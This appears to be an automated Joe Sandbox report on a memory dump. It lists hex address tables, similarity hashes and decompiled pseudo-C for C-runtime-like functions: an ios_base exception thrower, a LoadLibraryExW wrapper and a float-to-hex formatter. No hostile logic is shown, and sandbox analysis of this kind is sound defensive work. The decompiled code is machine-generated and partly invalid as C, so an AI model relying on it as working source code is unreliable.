                                                0x00c2a34a
                                                0x00c2a34d
                                                0x00c2a350
                                                0x00c2a351
                                                0x00c2a352
                                                0x00c2a355
                                                0x00c2a35b
                                                0x00c2a35d
                                                0x00c2a35f
                                                0x00c2a35f
                                                0x00c2a361
                                                0x00c2a363
                                                0x00000000
                                                0x00000000
                                                0x00c2a365
                                                0x00c2a367
                                                0x00c2a369
                                                0x00c2a36b
                                                0x00c2a376
                                                0x00c2a378
                                                0x00c2a37a
                                                0x00000000
                                                0x00000000
                                                0x00c2a37a
                                                0x00c2a36b
                                                0x00000000
                                                0x00c2a367
                                                0x00c2a37c
                                                0x00c2a37c
                                                0x00c2a382
                                                0x00c2a384
                                                0x00c2a38a
                                                0x00c2a38c
                                                0x00c2a3ae
                                                0x00c2a3ae
                                                0x00c2a3b0
                                                0x00c2a3b2
                                                0x00c2a3be
                                                0x00c2a3be
                                                0x00c2a3b4
                                                0x00c2a3b4
                                                0x00c2a3b6
                                                0x00000000
                                                0x00c2a3b8
                                                0x00c2a3b8
                                                0x00c2a3ba
                                                0x00c2a3bc
                                                0x00000000
                                                0x00000000
                                                0x00c2a3bc
                                                0x00c2a3b6
                                                0x00c2a3c6
                                                0x00c2a3ce
                                                0x00c2a3d4
                                                0x00c2a3d5
                                                0x00c2a3d7
                                                0x00c2a3df
                                                0x00c2a3e5
                                                0x00c2a3eb
                                                0x00c2a3f1
                                                0x00c2a405
                                                0x00c2a40a
                                                0x00c2a415
                                                0x00c2a425
                                                0x00c2a42b
                                                0x00c2a42d
                                                0x00c2a430
                                                0x00c2a453
                                                0x00c2a453
                                                0x00c2a458
                                                0x00c2a45e
                                                0x00c2a45e
                                                0x00c2a464
                                                0x00c2a46a
                                                0x00c2a470
                                                0x00c2a476
                                                0x00c2a47c
                                                0x00c2a49d
                                                0x00c2a4a2
                                                0x00c2a4a7
                                                0x00c2a4ab
                                                0x00c2a4b1
                                                0x00c2a4b4
                                                0x00c2a4c7
                                                0x00c2a4c7
                                                0x00c2a4cd
                                                0x00c2a4d3
                                                0x00c2a4d4
                                                0x00c2a4d5
                                                0x00c2a4da
                                                0x00c2a4dd
                                                0x00c2a4e3
                                                0x00c2a4e5
                                                0x00c2a543
                                                0x00c2a549
                                                0x00c2a551
                                                0x00c2a556
                                                0x00c2a55c
                                                0x00c2a55d
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00c2a4b6
                                                0x00c2a4b6
                                                0x00c2a4b9
                                                0x00c2a4bb
                                                0x00000000
                                                0x00c2a4bd
                                                0x00c2a4bd
                                                0x00c2a4c0
                                                0x00000000
                                                0x00c2a4c2
                                                0x00c2a4c2
                                                0x00c2a4c5
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00c2a4c5
                                                0x00c2a4c0
                                                0x00c2a4bb
                                                0x00c2a55f
                                                0x00c2a560
                                                0x00000000
                                                0x00c2a4e7
                                                0x00c2a4e7
                                                0x00c2a4ed
                                                0x00c2a4f5
                                                0x00c2a4fa
                                                0x00c2a509
                                                0x00c2a509
                                                0x00c2a511
                                                0x00c2a517
                                                0x00c2a51d
                                                0x00c2a524
                                                0x00c2a527
                                                0x00c2a529
                                                0x00c2a539
                                                0x00c2a53e
                                                0x00000000
                                                0x00c2a432
                                                0x00c2a432
                                                0x00c2a438
                                                0x00c2a439
                                                0x00c2a43a
                                                0x00c2a43b
                                                0x00c2a443
                                                0x00c2a443
                                                0x00c2a566
                                                0x00c2a566
                                                0x00c2a56d
                                                0x00c2a56e
                                                0x00c2a576
                                                0x00c2a57b
                                                0x00c2a57c
                                                0x00c2a38e
                                                0x00c2a38e
                                                0x00c2a391
                                                0x00c2a393
                                                0x00c2a3a8
                                                0x00000000
                                                0x00c2a395
                                                0x00c2a395
                                                0x00c2a398
                                                0x00c2a399
                                                0x00c2a39a
                                                0x00c2a39b
                                                0x00c2a3a0
                                                0x00c2a393
                                                0x00c2a581
                                                0x00c2a582
                                                0x00c2a584
                                                0x00c2a58b
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00c2a2d6
                                                0x00c2a2a9
                                                0x00c2a2ab
                                                0x00c2a2ac
                                                0x00c2a2ae
                                                0x00c2a2ae
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00c2a207
                                                0x00c2a207
                                                0x00c2a20d
                                                0x00c2a210
                                                0x00c2a213
                                                0x00c2a216
                                                0x00c2a219
                                                0x00c2a21c
                                                0x00c2a21f
                                                0x00c2a21f
                                                0x00000000
                                                0x00c2a1d0
                                                0x00c2a19e
                                                0x00c2a19e
                                                0x00c2a1a1
                                                0x00c2a22e
                                                0x00c2a22f
                                                0x00c2a234
                                                0x00000000
                                                0x00c2a234
                                                0x00c2a0d5
                                                0x00c2a0d5
                                                0x00c2a0d8
                                                0x00c2a0e0
                                                0x00c2a0e3
                                                0x00c2a0ea
                                                0x00c2a0ec
                                                0x00c2a0ee
                                                0x00c2a109
                                                0x00c2a10a
                                                0x00c2a10b
                                                0x00c2a10c
                                                0x00c2a111
                                                0x00c2a114
                                                0x00c2a117
                                                0x00c2a0f0
                                                0x00c2a0f0
                                                0x00c2a0f3
                                                0x00c2a0f4
                                                0x00c2a0f5
                                                0x00c2a0f6
                                                0x00c2a0f7
                                                0x00c2a0fc
                                                0x00c2a0fe
                                                0x00c2a101
                                                0x00c2a101
                                                0x00c2a119
                                                0x00c2a11b
                                                0x00000000
                                                0x00000000
                                                0x00c2a124
                                                0x00c2a127
                                                0x00c2a12a
                                                0x00c2a12c
                                                0x00c2a12e
                                                0x00000000
                                                0x00c2a130
                                                0x00c2a130
                                                0x00c2a133
                                                0x00000000
                                                0x00c2a133
                                                0x00000000
                                                0x00c2a12e
                                                0x00c2a1a9
                                                0x00c2a235
                                                0x00c2a238
                                                0x00c2a23c
                                                0x00c2a245
                                                0x00c2a248
                                                0x00c2a24c
                                                0x00c2a24c
                                                0x00c2a24e
                                                0x00c2a251
                                                0x00c2a253
                                                0x00c2a255
                                                0x00c2a257
                                                0x00c2a25c
                                                0x00c2a25d
                                                0x00c2a261
                                                0x00c2a261
                                                0x00c2a265
                                                0x00c2a268
                                                0x00c2a268
                                                0x00c2a26c
                                                0x00000000
                                                0x00c2a273
                                                0x00c2a0a5
                                                0x00c2a0a5
                                                0x00c2a0ac
                                                0x00c2a0ad
                                                0x00c2a0af
                                                0x00c2a274
                                                0x00c2a278
                                                0x00c2a278
                                                0x00000000

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.443436477.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                • Associated: 0000000C.00000002.443279176.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.443765227.0000000000C34000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.443923174.0000000000C42000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.444652620.0000000000C97000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.444675545.0000000000C98000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.444742097.0000000000C9A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_c10000_8F68.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: _free
                                                • String ID: *?
                                                • API String ID: 269201875-2564092906
                                                • Opcode ID: 7dcde57c3914610e2cb8b929f0995d85ba779a8bf28f52ff0693b4c8c1b62bc1
                                                • Instruction ID: d81095092fe6bc07833a14511eb5045408a90c026bc2273e58f35a5b1ad5d0b3
                                                • Opcode Fuzzy Hash: 7dcde57c3914610e2cb8b929f0995d85ba779a8bf28f52ff0693b4c8c1b62bc1
                                                • Instruction Fuzzy Hash: B3614B75E00229EFDB14CFA9D8815EEFBF5EF48320F24816AE815E7700D635AE419B91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 61%
                                                			E00C12010(void* __ebx, void* __ecx, signed int _a4, char _a8) {
                                                				char _v24;
                                                				char _v32;
                                                				intOrPtr _v48;
                                                				signed int _t20;
                                                				void* _t23;
                                                				void* _t33;
                                                				signed char _t36;
                                                				intOrPtr* _t37;
                                                				intOrPtr* _t40;
                                                				char* _t45;
                                                				intOrPtr _t46;
                                                
                                                				_t33 = __ebx;
                                                				_t20 = _a4 & 0x00000017;
                                                				 *(__ecx + 0xc) = _t20;
                                                				_t36 =  *(__ecx + 0x10) & _t20;
                                                				if(_t36 == 0) {
                                                					return _t20;
                                                				} else {
                                                					if(_a8 != 0) {
                                                						E00C18030(0, 0);
                                                					}
                                                					if((_t36 & 0x00000004) == 0) {
                                                						_t45 =  ==  ? "ios_base::eofbit set" : "ios_base::failbit set";
                                                					} else {
                                                						_t45 = "ios_base::badbit set";
                                                					}
                                                					_t23 = E00C11390( &_v32, 1);
                                                					_t37 =  &_v24;
                                                					L00C11F60(_t33, _t37, _t45, _t23);
                                                					E00C18030( &_v32, 0xc41170);
                                                					asm("int3");
                                                					asm("int3");
                                                					asm("int3");
                                                					asm("int3");
                                                					asm("int3");
                                                					asm("int3");
                                                					asm("int3");
                                                					asm("int3");
                                                					asm("int3");
                                                					_push(_t45);
                                                					_t46 = _v48;
                                                					asm("xorps xmm0, xmm0");
                                                					_t40 = _t37;
                                                					 *_t40 = 0xc341b4;
                                                					asm("movq [eax], xmm0");
                                                					_t14 = _t46 + 4; // 0xc41174
                                                					E00C17F8B(_t14, _t40 + 4);
                                                					 *_t40 = 0xc34240;
                                                					_t15 = _t46 + 0xc; // 0xc4119c
                                                					_t16 = _t46 + 0x10; // 0x0
                                                					 *((intOrPtr*)(_t40 + 0xc)) =  *_t15;
                                                					 *((intOrPtr*)(_t40 + 0x10)) =  *_t16;
                                                					 *_t40 = 0xc342ec;
                                                					return _t40;
                                                				}
                                                			}














                                                0x00c12010
                                                0x00c1201c
                                                0x00c1201f
                                                0x00c12026
                                                0x00c12028
                                                0x00c12036
                                                0x00c1202a
                                                0x00c1202e
                                                0x00c1203d
                                                0x00c1203d
                                                0x00c12045
                                                0x00c1205b
                                                0x00c12047
                                                0x00c12047
                                                0x00c12047
                                                0x00c12065
                                                0x00c1206d
                                                0x00c12073
                                                0x00c12082
                                                0x00c12087
                                                0x00c12088
                                                0x00c12089
                                                0x00c1208a
                                                0x00c1208b
                                                0x00c1208c
                                                0x00c1208d
                                                0x00c1208e
                                                0x00c1208f
                                                0x00c12090
                                                0x00c12091
                                                0x00c12095
                                                0x00c12099
                                                0x00c1209f
                                                0x00c120a5
                                                0x00c120a9
                                                0x00c120ad
                                                0x00c120b2
                                                0x00c120bb
                                                0x00c120be
                                                0x00c120c1
                                                0x00c120c6
                                                0x00c120c9
                                                0x00c120d1
                                                0x00c120d1

                                                APIs
                                                • ___std_exception_copy.LIBVCRUNTIME ref: 00C120AD
                                                  • Part of subcall function 00C18030: RaiseException.KERNEL32(E06D7363,00000001,00000003,00C14618,?,?,?,00C1555F,00C14618,00C407D0,?,00C14618,?,?,?,00C3F5CC), ref: 00C18090
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.443436477.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                • Associated: 0000000C.00000002.443279176.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.443765227.0000000000C34000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.443923174.0000000000C42000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.444652620.0000000000C97000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.444675545.0000000000C98000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.444742097.0000000000C9A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_c10000_8F68.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ExceptionRaise___std_exception_copy
                                                • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                • API String ID: 3109751735-1866435925
                                                • Opcode ID: 20e11efd1c3a854d9bf3691954015c20e71f1b4b0f67af221bfcd7d44e83af42
                                                • Instruction ID: 5282984a0e2f602c580956afaf35b76ad3263d1f4ba93d86210495d3cf73a82d
                                                • Opcode Fuzzy Hash: 20e11efd1c3a854d9bf3691954015c20e71f1b4b0f67af221bfcd7d44e83af42
                                                • Instruction Fuzzy Hash: E81159F69147046FC714DF68C842BD6B3E8AF0A310F04C62AFA64D7251F770A995DB90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E00C1B712(WCHAR* _a4) {
                                                				struct HINSTANCE__* _t4;
                                                
                                                				_t4 = LoadLibraryExW(_a4, 0, 0x800);
                                                				if(_t4 != 0) {
                                                					return _t4;
                                                				} else {
                                                					if(GetLastError() != 0x57 || E00C22F08(_a4, L"api-ms-", 7) == 0) {
                                                						return 0;
                                                					}
                                                					return LoadLibraryExW(_a4, 0, 0);
                                                				}
                                                			}




                                                0x00c1b71f
                                                0x00c1b727
                                                0x00c1b75c
                                                0x00c1b729
                                                0x00c1b732
                                                0x00000000
                                                0x00c1b759
                                                0x00c1b758
                                                0x00c1b758

                                                APIs
                                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00C1B6C3,00000000,?,00C990DC,?,?,?,00C1B866,00000004,InitializeCriticalSectionEx,00C35B90,InitializeCriticalSectionEx), ref: 00C1B71F
                                                • GetLastError.KERNEL32(?,00C1B6C3,00000000,?,00C990DC,?,?,?,00C1B866,00000004,InitializeCriticalSectionEx,00C35B90,InitializeCriticalSectionEx,00000000,?,00C1B61D), ref: 00C1B729
                                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 00C1B751
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.443436477.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                • Associated: 0000000C.00000002.443279176.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.443765227.0000000000C34000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.443923174.0000000000C42000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.444652620.0000000000C97000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.444675545.0000000000C98000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.444742097.0000000000C9A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_c10000_8F68.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: LibraryLoad$ErrorLast
                                                • String ID: api-ms-
                                                • API String ID: 3177248105-2084034818
                                                • Opcode ID: 0cb87f6c7715870b2563f645bd04313f474c3a311c6def6e02627f31f553c73a
                                                • Instruction ID: 939e54e46a0494bd615530bff0a3af1c8d2abce11fdb50cdaf8462c0bc33efe4
                                                • Opcode Fuzzy Hash: 0cb87f6c7715870b2563f645bd04313f474c3a311c6def6e02627f31f553c73a
                                                • Instruction Fuzzy Hash: D4E01A313A0204B7EF141B60ED86FA83F649B41B54F110020FA0CA85E0DB61AA94AED4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 81%
                                                			E00C23A14(void* __edx, signed int* _a4, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24, signed int _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr _a40) {
                                                				signed int _v5;
                                                				signed int _v12;
                                                				signed int _v16;
                                                				signed int _v20;
                                                				unsigned int _v24;
                                                				signed int _v32;
                                                				signed int _v40;
                                                				char _v48;
                                                				intOrPtr _v56;
                                                				char _v60;
                                                				void* __ebx;
                                                				void* __edi;
                                                				signed char _t85;
                                                				void* _t91;
                                                				signed int _t95;
                                                				signed int _t97;
                                                				signed int _t98;
                                                				signed int _t99;
                                                				signed int _t104;
                                                				signed int _t105;
                                                				void* _t106;
                                                				signed int _t107;
                                                				void* _t108;
                                                				void* _t110;
                                                				void* _t113;
                                                				void* _t115;
                                                				signed int _t117;
                                                				signed int* _t118;
                                                				void* _t121;
                                                				signed int _t123;
                                                				signed int _t129;
                                                				signed int* _t130;
                                                				signed int* _t133;
                                                				signed int _t134;
                                                				signed int _t137;
                                                				signed int _t139;
                                                				signed int _t141;
                                                				signed int _t146;
                                                				signed int _t147;
                                                				signed int _t149;
                                                				signed int _t150;
                                                				void* _t154;
                                                				unsigned int _t155;
                                                				signed int _t162;
                                                				void* _t163;
                                                				signed int _t164;
                                                				signed int* _t165;
                                                				signed int _t168;
                                                				signed int _t173;
                                                				signed int _t174;
                                                				signed int _t175;
                                                				signed int _t177;
                                                				signed int _t178;
                                                				signed int _t179;
                                                				void* _t181;
                                                
                                                				_t163 = __edx;
                                                				_t173 = _a24;
                                                				if(_t173 < 0) {
                                                					_t173 = 0;
                                                				}
                                                				_t177 = _a8;
                                                				 *_t177 = 0;
                                                				E00C1BDEE( &_v60, _t163, _a36);
                                                				_t5 = _t173 + 0xb; // 0xb
                                                				_t185 = _a12 - _t5;
                                                				if(_a12 > _t5) {
                                                					_t133 = _a4;
                                                					_t139 = _t133[1];
                                                					_t164 =  *_t133;
                                                					__eflags = (_t139 >> 0x00000014 & 0x000007ff) - 0x7ff;
                                                					if((_t139 >> 0x00000014 & 0x000007ff) != 0x7ff) {
                                                						__eflags = _t139;
                                                						if(__eflags > 0) {
                                                							L14:
                                                							_t165 = _t177 + 1;
                                                							_t85 = _a28 ^ 0x00000001;
                                                							_v16 = 0x3ff;
                                                							_v5 = _t85;
                                                							_v40 = _t165;
                                                							_v32 = ((_t85 & 0x000000ff) << 5) + 7;
                                                							__eflags = _t139 & 0x7ff00000;
                                                							_t91 = 0x30;
                                                							if((_t139 & 0x7ff00000) != 0) {
                                                								 *_t177 = 0x31;
                                                								L19:
                                                								_t141 = 0;
                                                								__eflags = 0;
                                                								L20:
                                                								_t178 =  &(_t165[0]);
                                                								_v12 = _t178;
                                                								__eflags = _t173;
                                                								if(_t173 != 0) {
                                                									_t95 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v56 + 0x88))))));
                                                								} else {
                                                									_t95 = _t141;
                                                								}
                                                								 *_t165 = _t95;
                                                								_t97 = _t133[1] & 0x000fffff;
                                                								__eflags = _t97;
                                                								_v24 = _t97;
                                                								if(_t97 > 0) {
                                                									L25:
                                                									_t166 = _t141;
                                                									_t142 = 0xf0000;
                                                									_t98 = 0x30;
                                                									_v12 = _t98;
                                                									_v20 = _t141;
                                                									_v24 = 0xf0000;
                                                									do {
                                                										__eflags = _t173;
                                                										if(_t173 <= 0) {
                                                											break;
                                                										}
                                                										_t121 = E00C32930( *_t133 & _t166, _v12, _t133[1] & _t142 & 0x000fffff);
                                                										_t154 = 0x30;
                                                										_t123 = _t121 + _t154 & 0x0000ffff;
                                                										__eflags = _t123 - 0x39;
                                                										if(_t123 > 0x39) {
                                                											_t123 = _t123 + _v32;
                                                											__eflags = _t123;
                                                										}
                                                										_t155 = _v24;
                                                										_t166 = (_t155 << 0x00000020 | _v20) >> 4;
                                                										 *_t178 = _t123;
                                                										_t178 = _t178 + 1;
                                                										_t142 = _t155 >> 4;
                                                										_t98 = _v12 - 4;
                                                										_t173 = _t173 - 1;
                                                										_v20 = (_t155 << 0x00000020 | _v20) >> 4;
                                                										_v24 = _t155 >> 4;
                                                										_v12 = _t98;
                                                										__eflags = _t98;
                                                									} while (_t98 >= 0);
                                                									_v12 = _t178;
                                                									__eflags = _t98;
                                                									if(__eflags < 0) {
                                                										goto L42;
                                                									}
                                                									_t117 = E00C2422F(__eflags, _t133, _t166, _t142, _t98, _a40);
                                                									_t181 = _t181 + 0x14;
                                                									__eflags = _t117;
                                                									if(_t117 == 0) {
                                                										goto L42;
                                                									}
                                                									_t118 = _t178 - 1;
                                                									_t137 = 0x30;
                                                									while(1) {
                                                										_t149 =  *_t118;
                                                										__eflags = _t149 - 0x66;
                                                										if(_t149 == 0x66) {
                                                											goto L35;
                                                										}
                                                										__eflags = _t149 - 0x46;
                                                										if(_t149 != 0x46) {
                                                											_t133 = _a4;
                                                											__eflags = _t118 - _v40;
                                                											if(_t118 == _v40) {
                                                												_t54 = _t118 - 1;
                                                												 *_t54 =  *(_t118 - 1) + 1;
                                                												__eflags =  *_t54;
                                                											} else {
                                                												__eflags = _t149 - 0x39;
                                                												if(_t149 != 0x39) {
                                                													_t150 = _t149 + 1;
                                                													__eflags = _t150;
                                                												} else {
                                                													_t150 = _v32 + 0x3a;
                                                												}
                                                												 *_t118 = _t150;
                                                											}
                                                											goto L42;
                                                										}
                                                										L35:
                                                										 *_t118 = _t137;
                                                										_t118 = _t118 - 1;
                                                									}
                                                								} else {
                                                									__eflags =  *_t133 - _t141;
                                                									if( *_t133 <= _t141) {
                                                										L42:
                                                										__eflags = _t173;
                                                										if(_t173 > 0) {
                                                											_push(_t173);
                                                											_t115 = 0x30;
                                                											_push(_t115);
                                                											_push(_t178);
                                                											E00C18BB0(_t173);
                                                											_t178 = _t178 + _t173;
                                                											__eflags = _t178;
                                                											_v12 = _t178;
                                                										}
                                                										_t99 = _v40;
                                                										__eflags =  *_t99;
                                                										if( *_t99 == 0) {
                                                											_t178 = _t99;
                                                											_v12 = _t178;
                                                										}
                                                										 *_t178 = (_v5 << 5) + 0x50;
                                                										_t104 = E00C32930( *_t133, 0x34, _t133[1]);
                                                										_t179 = 0;
                                                										_t105 = _v12;
                                                										_t146 = (_t104 & 0x000007ff) - _v16;
                                                										__eflags = _t146;
                                                										asm("sbb esi, esi");
                                                										_t168 = _t105 + 2;
                                                										_v40 = _t168;
                                                										if(__eflags < 0) {
                                                											L50:
                                                											_t146 =  ~_t146;
                                                											asm("adc esi, 0x0");
                                                											_t179 =  ~_t179;
                                                											_t134 = 0x2d;
                                                											goto L51;
                                                										} else {
                                                											if(__eflags > 0) {
                                                												L49:
                                                												_t134 = 0x2b;
                                                												L51:
                                                												 *(_t105 + 1) = _t134;
                                                												_t174 = _t168;
                                                												_t106 = 0x30;
                                                												 *_t168 = _t106;
                                                												_t107 = 0;
                                                												__eflags = _t179;
                                                												if(__eflags < 0) {
                                                													L55:
                                                													__eflags = _t174 - _t168;
                                                													if(_t174 != _t168) {
                                                														L59:
                                                														_push(_t134);
                                                														_push(_t107);
                                                														_push(0x64);
                                                														_push(_t179);
                                                														_t108 = E00C32950();
                                                														_t179 = _t134;
                                                														_t134 = _t146;
                                                														_v32 = _t168;
                                                														_t168 = _v40;
                                                														 *_t174 = _t108 + 0x30;
                                                														_t174 = _t174 + 1;
                                                														_t107 = 0;
                                                														__eflags = 0;
                                                														L60:
                                                														__eflags = _t174 - _t168;
                                                														if(_t174 != _t168) {
                                                															L64:
                                                															_push(_t134);
                                                															_push(_t107);
                                                															_push(0xa);
                                                															_push(_t179);
                                                															_push(_t146);
                                                															_t110 = E00C32950();
                                                															_v40 = _t168;
                                                															 *_t174 = _t110 + 0x30;
                                                															_t174 = _t174 + 1;
                                                															_t107 = 0;
                                                															__eflags = 0;
                                                															L65:
                                                															_t147 = _t146 + 0x30;
                                                															__eflags = _t147;
                                                															 *_t174 = _t147;
                                                															 *(_t174 + 1) = _t107;
                                                															_t175 = _t107;
                                                															L66:
                                                															if(_v48 != 0) {
                                                																 *(_v60 + 0x350) =  *(_v60 + 0x350) & 0xfffffffd;
                                                															}
                                                															return _t175;
                                                														}
                                                														__eflags = _t179 - _t107;
                                                														if(__eflags < 0) {
                                                															goto L65;
                                                														}
                                                														if(__eflags > 0) {
                                                															goto L64;
                                                														}
                                                														__eflags = _t146 - 0xa;
                                                														if(_t146 < 0xa) {
                                                															goto L65;
                                                														}
                                                														goto L64;
                                                													}
                                                													__eflags = _t179 - _t107;
                                                													if(__eflags < 0) {
                                                														goto L60;
                                                													}
                                                													if(__eflags > 0) {
                                                														goto L59;
                                                													}
                                                													__eflags = _t146 - 0x64;
                                                													if(_t146 < 0x64) {
                                                														goto L60;
                                                													}
                                                													goto L59;
                                                												}
                                                												_t134 = 0x3e8;
                                                												if(__eflags > 0) {
                                                													L54:
                                                													_push(_t134);
                                                													_push(_t107);
                                                													_push(_t134);
                                                													_push(_t179);
                                                													_t113 = E00C32950();
                                                													_t179 = _t134;
                                                													_t134 = _t146;
                                                													_v32 = _t168;
                                                													_t168 = _v40;
                                                													 *_t168 = _t113 + 0x30;
                                                													_t174 = _t168 + 1;
                                                													_t107 = 0;
                                                													__eflags = 0;
                                                													goto L55;
                                                												}
                                                												__eflags = _t146 - 0x3e8;
                                                												if(_t146 < 0x3e8) {
                                                													goto L55;
                                                												}
                                                												goto L54;
                                                											}
                                                											__eflags = _t146;
                                                											if(_t146 < 0) {
                                                												goto L50;
                                                											}
                                                											goto L49;
                                                										}
                                                									}
                                                									goto L25;
                                                								}
                                                							}
                                                							 *_t177 = _t91;
                                                							_t141 =  *_t133 | _t133[1] & 0x000fffff;
                                                							__eflags = _t141;
                                                							if(_t141 != 0) {
                                                								_v16 = 0x3fe;
                                                								goto L19;
                                                							}
                                                							_v16 = _t141;
                                                							goto L20;
                                                						}
                                                						if(__eflags < 0) {
                                                							L13:
                                                							 *_t177 = 0x2d;
                                                							_t177 = _t177 + 1;
                                                							__eflags = _t177;
                                                							_t139 = _t133[1];
                                                							goto L14;
                                                						}
                                                						__eflags = _t164;
                                                						if(_t164 >= 0) {
                                                							goto L14;
                                                						}
                                                						goto L13;
                                                					}
                                                					_t175 = E00C23D23(_t133, _t139, _t164, _t133, _t177, _a12, _a16, _a20, _t173, 0, _a32, 0, _a40);
                                                					__eflags = _t175;
                                                					if(_t175 == 0) {
                                                						_t129 = E00C32B70(_t177, 0x65);
                                                						__eflags = _t129;
                                                						if(_t129 != 0) {
                                                							_t162 = ((_a28 ^ 0x00000001) << 5) + 0x50;
                                                							__eflags = _t162;
                                                							 *_t129 = _t162;
                                                							 *((char*)(_t129 + 3)) = 0;
                                                						}
                                                						_t175 = 0;
                                                					} else {
                                                						 *_t177 = 0;
                                                					}
                                                					goto L66;
                                                				}
                                                				_t130 = E00C1DA28(_t185);
                                                				_t175 = 0x22;
                                                				 *_t130 = _t175;
                                                				E00C1D94E();
                                                				goto L66;
                                                			}


























































                                                0x00c23a14
                                                0x00c23a1f
                                                0x00c23a24
                                                0x00c23a26
                                                0x00c23a26
                                                0x00c23a2a
                                                0x00c23a33
                                                0x00c23a35
                                                0x00c23a3a
                                                0x00c23a3d
                                                0x00c23a40
                                                0x00c23a56
                                                0x00c23a59
                                                0x00c23a5e
                                                0x00c23a68
                                                0x00c23a6d
                                                0x00c23ac4
                                                0x00c23ac6
                                                0x00c23ad5
                                                0x00c23ad8
                                                0x00c23adb
                                                0x00c23add
                                                0x00c23ae4
                                                0x00c23af6
                                                0x00c23af9
                                                0x00c23afe
                                                0x00c23b02
                                                0x00c23b03
                                                0x00c23b23
                                                0x00c23b26
                                                0x00c23b26
                                                0x00c23b26
                                                0x00c23b28
                                                0x00c23b28
                                                0x00c23b2b
                                                0x00c23b2e
                                                0x00c23b30
                                                0x00c23b41
                                                0x00c23b32
                                                0x00c23b32
                                                0x00c23b32
                                                0x00c23b43
                                                0x00c23b48
                                                0x00c23b48
                                                0x00c23b4d
                                                0x00c23b50
                                                0x00c23b5a
                                                0x00c23b5c
                                                0x00c23b5e
                                                0x00c23b63
                                                0x00c23b64
                                                0x00c23b67
                                                0x00c23b6a
                                                0x00c23b6d
                                                0x00c23b6d
                                                0x00c23b6f
                                                0x00000000
                                                0x00000000
                                                0x00c23b86
                                                0x00c23b8d
                                                0x00c23b91
                                                0x00c23b94
                                                0x00c23b97
                                                0x00c23b99
                                                0x00c23b99
                                                0x00c23b99
                                                0x00c23b9f
                                                0x00c23ba2
                                                0x00c23ba6
                                                0x00c23ba8
                                                0x00c23bac
                                                0x00c23baf
                                                0x00c23bb2
                                                0x00c23bb3
                                                0x00c23bb6
                                                0x00c23bb9
                                                0x00c23bbc
                                                0x00c23bbc
                                                0x00c23bc1
                                                0x00c23bc4
                                                0x00c23bc7
                                                0x00000000
                                                0x00000000
                                                0x00c23bd0
                                                0x00c23bd5
                                                0x00c23bd8
                                                0x00c23bda
                                                0x00000000
                                                0x00000000
                                                0x00c23bde
                                                0x00c23be1
                                                0x00c23be2
                                                0x00c23be2
                                                0x00c23be4
                                                0x00c23be7
                                                0x00000000
                                                0x00000000
                                                0x00c23be9
                                                0x00c23bec
                                                0x00c23bf3
                                                0x00c23bf6
                                                0x00c23bf9
                                                0x00c23c0e
                                                0x00c23c0e
                                                0x00c23c0e
                                                0x00c23bfb
                                                0x00c23bfb
                                                0x00c23bfe
                                                0x00c23c08
                                                0x00c23c08
                                                0x00c23c00
                                                0x00c23c03
                                                0x00c23c03
                                                0x00c23c0a
                                                0x00c23c0a
                                                0x00000000
                                                0x00c23bf9
                                                0x00c23bee
                                                0x00c23bee
                                                0x00c23bf0
                                                0x00c23bf0
                                                0x00c23b52
                                                0x00c23b52
                                                0x00c23b54
                                                0x00c23c11
                                                0x00c23c11
                                                0x00c23c13
                                                0x00c23c15
                                                0x00c23c18
                                                0x00c23c19
                                                0x00c23c1a
                                                0x00c23c1b
                                                0x00c23c23
                                                0x00c23c23
                                                0x00c23c25
                                                0x00c23c25
